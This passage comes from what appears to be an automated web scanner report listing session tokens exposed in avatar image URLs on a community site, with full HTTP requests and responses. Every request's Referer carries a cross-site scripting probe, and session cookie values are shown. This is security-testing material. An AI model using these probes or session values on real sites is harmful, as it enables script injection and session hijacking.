User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 302 Moved Temporarily
Date: Fri, 12 Aug 2011 13:53:45 GMT
Server: Apache-Coyote/1.1
Location: https://www.paypal.com/cgi-bin/webscr?cmd=_account-authenticate-login&RequestFromPortal=true&token=HA-DD2JDQKXPXNFG
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 0
Vary: User-Agent
JP: D=7156 t=1313157225523734
Cache-Control: no-cache, private
Connection: close


3.4. https://www.x.com/people/Bill_at_Repaid.com/avatar  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/Bill_at_Repaid.com/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/Bill_at_Repaid.com/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:23 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=9807 t=1313157144371655
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Length: 1865

.PNG
.
...IHDR...0...0.....W.......IDATx....W..........m.so....[iU..C]je).
XD.l.@T0@.BX....HBH    .W. .(....SR....{.......y>.d..g....]..-..Fcx...^8..k$...~.;.>..D.    ...W..K.;    ..x..Z.V^.B..2l..F.6.h..;:
...[SNIP]...

3.5. https://www.x.com/people/DaveLeWave/avatar  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/DaveLeWave/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/DaveLeWave/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=6964 t=1313157136764283
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Length: 1865

.PNG
.
...IHDR...0...0.....W.......IDATx....W..........m.so....[iU..C]je).
XD.l.@T0@.BX....HBH    .W. .(....SR....{.......y>.d..g....]..-..Fcx...^8..k$...~.;.>..D.    ...W..K.;    ..x..Z.V^.B..2l..F.6.h..;:
...[SNIP]...

3.6. https://www.x.com/people/Jareth_2005/avatar  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/Jareth_2005/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/Jareth_2005/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=10461 t=1313157137312841
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 1865

.PNG
.
...IHDR...0...0.....W.......IDATx....W..........m.so....[iU..C]je).
XD.l.@T0@.BX....HBH    .W. .(....SR....{.......y>.d..g....]..-..Fcx...^8..k$...~.;.>..D.    ...W..K.;    ..x..Z.V^.B..2l..F.6.h..;:
...[SNIP]...

3.7. https://www.x.com/people/Maxatnes/avatar  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/Maxatnes/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/Maxatnes/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=7800 t=1313157136922093
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Length: 1865

.PNG
.
...IHDR...0...0.....W.......IDATx....W..........m.so....[iU..C]je).
XD.l.@T0@.BX....HBH    .W. .(....SR....{.......y>.d..g....]..-..Fcx...^8..k$...~.;.>..D.    ...W..K.;    ..x..Z.V^.B..2l..F.6.h..;:
...[SNIP]...

3.8. https://www.x.com/people/Murugesh_cit/avatar  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/Murugesh_cit/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/Murugesh_cit/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=9205 t=1313157136915496
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Content-Length: 1865

.PNG
.
...IHDR...0...0.....W.......IDATx....W..........m.so....[iU..C]je).
XD.l.@T0@.BX....HBH    .W. .(....SR....{.......y>.d..g....]..-..Fcx...^8..k$...~.;.>..D.    ...W..K.;    ..x..Z.V^.B..2l..F.6.h..;:
...[SNIP]...

3.9. https://www.x.com/people/NetGuy/avatar  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/NetGuy/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/NetGuy/avatar;jsessionid=7B86CE8FA3BBFB8564D669ACF6D8115C.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: jive.recentHistory.-1=31342c323036333b31342c323030383b; s_pers=%20gpv_c43%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159104192%3B%20tr_p1%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159105062%3B%20gpv_events%3Dno%2520value%7C1313159105480%3B; JSESSIONID=7B86CE8FA3BBFB8564D669ACF6D8115C.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 14:11:05 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=14657 t=1313158266056768
Keep-Alive: timeout=5, max=59
Connection: Keep-Alive
Content-Length: 1865

.PNG
.
...IHDR...0...0.....W.......IDATx....W..........m.so....[iU..C]je).
XD.l.@T0@.BX....HBH    .W. .(....SR....{.......y>.d..g....]..-..Fcx...^8..k$...~.;.>..D.    ...W..K.;    ..x..Z.V^.B..2l..F.6.h..;:
...[SNIP]...

3.10. https://www.x.com/people/PP_MTS_Chad/avatar  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/PP_MTS_Chad/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/PP_MTS_Chad/avatar;jsessionid=7B86CE8FA3BBFB8564D669ACF6D8115C.node0/22.png?a=1249 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: jive.recentHistory.-1=31342c323036333b31342c323030383b; s_pers=%20gpv_c43%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159104192%3B%20tr_p1%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159105062%3B%20gpv_events%3Dno%2520value%7C1313159105480%3B; JSESSIONID=7B86CE8FA3BBFB8564D669ACF6D8115C.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 14:11:05 GMT
Server: Apache-Coyote/1.1
Last-Modified: Tue, 02 Mar 2010 21:30:22 GMT
Etag: "1249"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=8308 t=1313158266078257
Keep-Alive: timeout=5, max=55
Connection: Keep-Alive
Content-Length: 6035

.PNG
.
...IHDR...0...0......`n....ZIDATx.e..S[Y...46(.LV...H..PB9^.....r.H"cc.6.    .8.v........P;.....V.lm.[..$Jz..Y.bp.t... .h$*....9|.oL0.P...B...X2!....S3"*.JfR.cc.S".`........Q.L4....._..V....i..
...[SNIP]...

3.11. https://www.x.com/people/PP_MTS_Magarvin/avatar  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/PP_MTS_Magarvin/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/PP_MTS_Magarvin/avatar;jsessionid=7B86CE8FA3BBFB8564D669ACF6D8115C.node0/22.png?a=1014 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: jive.recentHistory.-1=31342c323036333b31342c323030383b; s_pers=%20gpv_c43%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159104192%3B%20tr_p1%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159105062%3B%20gpv_events%3Dno%2520value%7C1313159105480%3B; JSESSIONID=7B86CE8FA3BBFB8564D669ACF6D8115C.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 14:11:04 GMT
Server: Apache-Coyote/1.1
Last-Modified: Wed, 28 Oct 2009 04:35:03 GMT
Etag: "1014"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=8565 t=1313158264488096
Keep-Alive: timeout=5, max=51
Connection: Keep-Alive
Content-Length: 3347

.PNG
.
...IHDR...0...0.....W.......IDATx....pUu...I.. ..4....R.#.Q.>..D."D.. . ...JU,@...+".H/.4    U.".........7s.........+y....g...}..........m..1u..9r..!C.,(P.@T.B......y.n|...gf......>XMOI.......
...[SNIP]...

3.12. https://www.x.com/people/Saveby/avatar  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/Saveby/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/Saveby/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=7564 t=1313157137058073
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Length: 1865

.PNG
.
...IHDR...0...0.....W.......IDATx....W..........m.so....[iU..C]je).
XD.l.@T0@.BX....HBH    .W. .(....SR....{.......y>.d..g....]..-..Fcx...^8..k$...~.;.>..D.    ...W..K.;    ..x..Z.V^.B..2l..F.6.h..;:
...[SNIP]...

3.13. https://www.x.com/people/TrainingPal/avatar  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/TrainingPal/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/TrainingPal/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:22 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=9158 t=1313157142670558
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive
Content-Length: 1865

.PNG
.
...IHDR...0...0.....W.......IDATx....W..........m.so....[iU..C]je).
XD.l.@T0@.BX....HBH    .W. .(....SR....{.......y>.d..g....]..-..Fcx...^8..k$...~.;.>..D.    ...W..K.;    ..x..Z.V^.B..2l..F.6.h..;:
...[SNIP]...

3.14. https://www.x.com/people/WebBusinessDeveloper/avatar  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/WebBusinessDeveloper/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/WebBusinessDeveloper/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:23 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=11384 t=1313157143975147
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Length: 1865

.PNG
.
...IHDR...0...0.....W.......IDATx....W..........m.so....[iU..C]je).
XD.l.@T0@.BX....HBH    .W. .(....SR....{.......y>.d..g....]..-..Fcx...^8..k$...~.;.>..D.    ...W..K.;    ..x..Z.V^.B..2l..F.6.h..;:
...[SNIP]...

3.15. https://www.x.com/people/advance-software/avatar  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/advance-software/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/advance-software/avatar;jsessionid=7B86CE8FA3BBFB8564D669ACF6D8115C.node0/22.png?a=1288 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: jive.recentHistory.-1=31342c323036333b31342c323030383b; s_pers=%20gpv_c43%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159104192%3B%20tr_p1%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159105062%3B%20gpv_events%3Dno%2520value%7C1313159105480%3B; JSESSIONID=7B86CE8FA3BBFB8564D669ACF6D8115C.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 14:11:05 GMT
Server: Apache-Coyote/1.1
Last-Modified: Thu, 01 Apr 2010 11:40:04 GMT
Etag: "1288"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=14112 t=1313158266056527
Keep-Alive: timeout=5, max=81
Connection: Keep-Alive
Content-Length: 5463

.PNG
.
...IHDR...0...0.....W.......IDATx..Z.XT...F...}."....4Q.....(..... E....b.l.K.^...c...bK..M.$.$......qM{//..../............q..644..;w......z.......{x..Y.8p.{.....{q..    \.~.E[[...~..>..lmm...
...[SNIP]...

3.16. https://www.x.com/people/alfrednutile/avatar  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/alfrednutile/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/alfrednutile/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:17 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=7218 t=1313157137930962
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Length: 1865

.PNG
.
...IHDR...0...0.....W.......IDATx....W..........m.so....[iU..C]je).
XD.l.@T0@.BX....HBH    .W. .(....SR....{.......y>.d..g....]..-..Fcx...^8..k$...~.;.>..D.    ...W..K.;    ..x..Z.V^.B..2l..F.6.h..;:
...[SNIP]...

3.17. https://www.x.com/people/appcode/avatar  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/appcode/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/appcode/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=8301 t=1313157137177952
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Length: 1865

.PNG
.
...IHDR...0...0.....W.......IDATx....W..........m.so....[iU..C]je).
XD.l.@T0@.BX....HBH    .W. .(....SR....{.......y>.d..g....]..-..Fcx...^8..k$...~.;.>..D.    ...W..K.;    ..x..Z.V^.B..2l..F.6.h..;:
...[SNIP]...

3.18. https://www.x.com/people/cariad/avatar  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/cariad/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

